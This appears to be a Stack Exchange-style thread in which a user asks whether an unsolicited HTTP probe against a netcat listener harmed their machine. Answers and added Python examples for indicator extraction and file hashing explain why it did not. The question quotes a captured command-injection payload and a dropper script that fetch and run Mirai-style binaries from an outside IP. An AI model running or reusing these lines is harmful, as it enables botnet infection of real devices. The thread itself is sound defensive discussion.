
TLDR

Someone has connected to my netcat server and tried to execute a command. Is it possible they have done any harm to me/my computer/my network?

Detailed story

I've been learning about networking and sockets recently. As a programming exercise I created a simple tcp client and wanted to test it with a netcat server.

Everything worked as expected - my client had connected to the server correctly.

My friend asked me to send them the client app so they could have a look. In order for the app to work for them with my local server I had to set up port forwarding on my router. I always knew it could be dangerous, so I only wanted to set it up temporarily.

I started the server with a netcat command:

nc -lvp 8080

and the next thing I noticed is that someone had connected to my server, but it wasn't my friend!

In my netcat output I can see this:

Connection from 1.192.147.162:60185
POST /cgi-bin/ViewLog.asp HTTP/1.1
Host: 192.168.0.14:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded

/bin/busybox wget http://135.148.104.21/w.sh; chmod +x w.sh; ./w.sh%

You can see the Host as 192.168.0.14, but there's no such device on my network! However I do understand the headers can be easily forged.

I have downloaded the w.sh to have a look at its contents - here they are:

wget http://135.148.104.21/bins/arm; chmod 777 arm; ./arm unidentified.arm
wget http://135.148.104.21/bins/arm5; chmod 777 arm5; ./arm5 unidentified.arm5
wget http://135.148.104.21/bins/arm6; chmod 777 arm6; ./arm6 unidentified.arm6
wget http://135.148.104.21/bins/arm7; chmod 777 arm7; ./arm7 unidentified.arm7
wget http://135.148.104.21/bins/mips; chmod 777 mips; ./mips unidentified.mips
wget http://135.148.104.21/bins/mipsel; chmod 777 mipsel; ./mipsel unidentified.mipsel
wget http://135.148.104.21/bins/x86; chmod 777 x86; ./x86 unidentified.x86
wget http://135.148.104.21/bins/i686; chmod 777 i686; ./i686 unidentified.i686
wget http://135.148.104.21/bins/i586; chmod 777 i586; ./i586 unidentified.i586
wget http://135.148.104.21/bins/arc; chmod 777 arc; ./arc unidentified.arc
wget http://135.148.104.21/bins/sh4; chmod 777 sh4; ./sh4 unidentified.sh4


rm $0 

I have downloaded one of the above files, but it seems that they're binary, so I didn't know how to analyse them.

Definitely seems like the attacker from China (location of the IP) was trying to download a script, execute it and gather some info from my computer, and likely tried to connect my computer to the Mirai botnet (credits to the Reddit user henrique_wavy for finding this). However, the question is: is it even possible with the netcat server I was running? Am I in danger here?

Of course I have disabled the port forwarding straight away...

I'm running macOS 12.6 and GNU netcat 0.7.1, if it matters.

  • netcat should just be echoing what was sent to it over that port. For what it's worth, that looks like an external script attempting to exploit an ASP web server's /cgi-bin/ViewLog.asp to have it execute commands locally. Since the connection wasn't to an ASP web server (and therefore didn't have the vulnerability this was meant to exploit), you're probably ok. Other commands might have been executed that do exploit netcat, but it's a lot less likely. Use this experience as a lesson in how ubiquitous the bad actors are, and carry on. FYI 8080 is a popular "the other web server" port.
    – Gus
    Commented Oct 10, 2022 at 15:01

2 Answers


Old post, however...

No. Obviously an attempted attack. Yet based on your command, absolutely not.

This...

nc -lvp 8080

...is not connected to anything.

Assuming that is the whole story. If that is the whole server, nothing for them to access. Looks like a bot trying to probe the ability to manipulate your CGI. You don't have CGI, according to what you posted. Simple netcat server. They are counting on exploiting a full-blown webserver. Not your little listener. Which is, rightfully and technically speaking, a server. But if that is the whole command, nothing for them to run. And the only access is data you feed via the command line.

The only thing they can do with nc -lvp 8080 is wait for you to type something.

Literally, failed threat. Only output there is what you type after, in the window-- IF the agent accepts it.

Also, the bot is looking for a Linux server. Are you running on Linux?

Definitely nothing happening here, except failed exploits.

Script they're trying to run... /bin/busybox wget http://135.148.104.21/w.sh; chmod +x w.sh; ./w.sh%

Can only run on a Linux-based webserver that has busybox. But the script is only presented as text. Which is all it is. It has to be executed to actually do anything other than display its own code for you to see.
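To make concrete what this answer and the comment under the question both say, here is an added example (not code from the question or from either answer) that treats the netcat output as what it is, plain text, and triages it: it splits the capture into source, request line, headers and body, pulls out the URLs a defender would block and search logs for, flags shell separators in the POST body, and notes that the Host header names port 80 while the listener was on 8080. The sample string is the capture from the question reproduced verbatim; the regexes and the 8080 listener port are this example's own assumptions. Nothing in it executes any part of the body.

```python
"""Triage of a request captured by a bare `nc -lvp 8080` listener.

Added example, not part of the original question or answers. netcat prints
the bytes a client sends and interprets none of them; this takes that printed
text and extracts what a defender would record. Patterns and the listener
port (8080) are this example's assumptions.
"""
import re
from urllib.parse import urlsplit

# Constructed sample: the capture shown in the question, reproduced verbatim.
CAPTURE = """Connection from 1.192.147.162:60185
POST /cgi-bin/ViewLog.asp HTTP/1.1
Host: 192.168.0.14:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded

/bin/busybox wget http://135.148.104.21/w.sh; chmod +x w.sh; ./w.sh%
"""

CONN_RE = re.compile(r"^Connection from (\S+):(\d+)$")
REQ_RE = re.compile(r"^([A-Z]+) (\S+) HTTP/(1\.[01])$")
URL_RE = re.compile(r"https?://[^\s;\"'<>|&]+")
# Shell separators and download-and-execute verbs: none belong in a form body.
INJECTION_RE = re.compile(r"(;|\|\||&&|`|\$\()|\b(wget|curl|tftp|busybox|chmod)\b")


def parse_capture(text):
    """Split netcat's terminal output into connection info, request line, headers and body."""
    lines = text.splitlines()
    conn = CONN_RE.match(lines[0]) if lines else None
    req = REQ_RE.match(lines[1]) if len(lines) > 1 else None
    headers = {}
    i = 2
    while i < len(lines) and lines[i] != "":
        name, _, value = lines[i].partition(":")
        headers[name.strip().lower()] = value.strip()
        i += 1
    body = "\n".join(lines[i + 1:])  # everything after the blank separator line
    return {
        "src_ip": conn.group(1) if conn else None,
        "src_port": int(conn.group(2)) if conn else None,
        "method": req.group(1) if req else None,
        "path": req.group(2) if req else None,
        "is_http": req is not None,
        "headers": headers,
        "body": body,
    }


def extract_iocs(parsed, listener_port=8080):
    """Indicators worth blocking or searching logs for. The body is only inspected, never run."""
    body = parsed["body"]
    urls = URL_RE.findall(body)
    host = parsed["headers"].get("host", "")
    host_port = urlsplit("//" + host).port if host else None
    return {
        "source": f'{parsed["src_ip"]}:{parsed["src_port"]}',
        "target_path": parsed["path"],
        "user_agent": parsed["headers"].get("user-agent"),
        "host_header": host,
        # A Host header naming a different port than the one we listen on means the
        # scanner filled it in itself rather than deriving it from the connection.
        "host_port_mismatch": host_port is not None and host_port != listener_port,
        "payload_urls": urls,
        "payload_hosts": sorted({urlsplit(u).hostname for u in urls}),
        "command_injection": INJECTION_RE.search(body) is not None,
        # Declared versus actually printed body size: a gap means netcat did not show
        # the whole body, or the client never sent it.
        "declared_length": int(parsed["headers"].get("content-length", 0)),
        "received_length": len(body.encode()),
    }


if __name__ == "__main__":
    for key, value in extract_iocs(parse_capture(CAPTURE)).items():
        print(f"{key:20} {value}")
```

Run it and you get the two things to act on: the download host 135.148.104.21 to block or hunt for in firewall logs, and confirmation that the "command" arrived as a string inside an HTTP body that only a vulnerable CGI handler would have passed to a shell.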


Is it possible? Yes. Is it probable? No, but it depends on a lot. The shorter the amount of time the process was listening, the better, and the less chance that someone or some script compromised the system.

Is the netcat listener running and listening as a privileged user or a regular user? If it's running as a regular user, that's better.

How are you logging the incoming connections? Are you only seeing standard out?

Does the system have some type of security subsystem like selinux? If so that would do a lot to restrict what system capabilities an un-trusted process would be able to use.

If it was just a script passing by, finding your listening socket bound to a port and then connecting, you "may" be ok, but you would need to have been logging all incoming packets and auditing all system calls, and watching the process list to be sure, and you would need to have confidence that the log files weren't modified or altered, better yet, you have a remote log server configured and are forwarding all log events to it.

Having a baseline cryptographic hash of all files on the file system, created beforehand, and stored somewhere other than the same hard drive, would also allow you to validate that nothing on the file system changed. You could generate all the hashes again and verify that they all match.

  • Answer edited to remove mention of starting a shell.
    – Chris
    Commented Oct 11, 2022 at 21:04
  • "How are you logging the incoming connections? Are you only seeing standard out?" I ran netcat in verbose mode (nc -lvp 8080) and everything was displayed in my terminal; that's all I know about logging. "Is the netcat listener running and listening as a privileged user or a regular user?" It was running as me without sudo, so a regular user, I guess. I understand that your answer aims at the question in the title - thanks! - but the more specific question I asked is: is it possible that someone has executed commands on my computer if I was just running nc -lvp 8080 on my machine?
    – nom4d
    Commented Oct 12, 2022 at 7:43
  • My guess is no, based on the fact that the only output you see is from the one script connecting and trying a non-applicable Windows exploit. Were you always running nc in verbose mode, or was it left running for a while without verbosity? Do you have a logger running? If so, have you gone through all of the system logs to see if there's anything that stands out? I would note as closely as possible the date and time when nc was running, and look at all events at and around that time stamp in all of your logs as a next step.
    – Chris
    Commented Oct 12, 2022 at 15:48
  • A "safer" way to test your app with your friend who's remote is to configure the port forward rule to only allow incoming connections to tcp/8080 from his public IP address. He can use whatismyip.com or similar sites to determine what it is. If your router's software doesn't allow you to specify the port forward from just one IP, consider replacing it with a better router. I would only enable the forward while your friend is testing, and I would turn it off when not needed.
    – Chris
    Commented Oct 12, 2022 at 16:01
  • @Chris Ummm... don't you think that is all a bit overkill for a command statement that can only write to stdout? And furthermore, relies only on stdin for input? Are you actually familiar with this command?
    – jdmayfield
    Commented Nov 23, 2023 at 9:01
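The second answer's last paragraph recommends a baseline of cryptographic hashes taken before exposing anything, kept off the disk, and re-checked afterwards. The following is an added example of that check, not code from the answer or from any tool it names: it walks a directory tree, hashes every regular file with SHA-256, and diffs a saved manifest against a fresh one to report added, removed and modified files. The directory layout and file contents in `demo()` are constructed for illustration; in practice you would run `build_manifest` over the real file system before opening the port and store the JSON somewhere the machine cannot rewrite it.

```python
"""File-integrity baseline and verification.

Added example, not part of the original answer. Hash every regular file under
a root, keep the manifest off-host, and later compare a fresh manifest against
it. The sample tree built in demo() is constructed; it is not real data.
"""
import hashlib
import json
import os
import tempfile

CHUNK = 1 << 20  # hash in 1 MiB chunks so large files need not fit in memory


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map each regular file (path relative to root) to its SHA-256 hex digest."""
    manifest = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue  # skip symlinks, sockets and devices; only file contents are hashed
            manifest[os.path.relpath(full, root)] = sha256_file(full)
    return manifest


def compare_manifests(baseline, current):
    """Report what changed between a stored baseline and a fresh manifest."""
    base_paths, cur_paths = set(baseline), set(current)
    return {
        "added": sorted(cur_paths - base_paths),
        "removed": sorted(base_paths - cur_paths),
        "modified": sorted(p for p in base_paths & cur_paths if baseline[p] != current[p]),
    }


def demo():
    """Constructed scenario: baseline a small tree, change it three ways, re-verify."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "etc"))
        with open(os.path.join(root, "busybox"), "wb") as f:
            f.write(b"original busybox bytes")
        with open(os.path.join(root, "notes.txt"), "w") as f:
            f.write("nothing to see\n")
        with open(os.path.join(root, "etc", "config"), "w") as f:
            f.write("unchanged=1\n")

        # Baseline taken before exposing the listener; serialise it for off-host storage.
        saved = json.dumps(build_manifest(root), sort_keys=True)

        # Simulated changes: a new binary dropped, an existing binary replaced, a file removed.
        with open(os.path.join(root, "arm7"), "wb") as f:
            f.write(b"\x7fELF constructed payload bytes")
        with open(os.path.join(root, "busybox"), "wb") as f:
            f.write(b"replaced busybox bytes")
        os.remove(os.path.join(root, "notes.txt"))

        # Verification: reload the stored baseline and compare against a fresh walk.
        return compare_manifests(json.loads(saved), build_manifest(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The unchanged `etc/config` shows up in neither list, which is the point of the check: a clean comparison after the exposure window is the evidence that nothing on disk was altered, provided the baseline itself was stored where a compromised host could not rewrite it.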
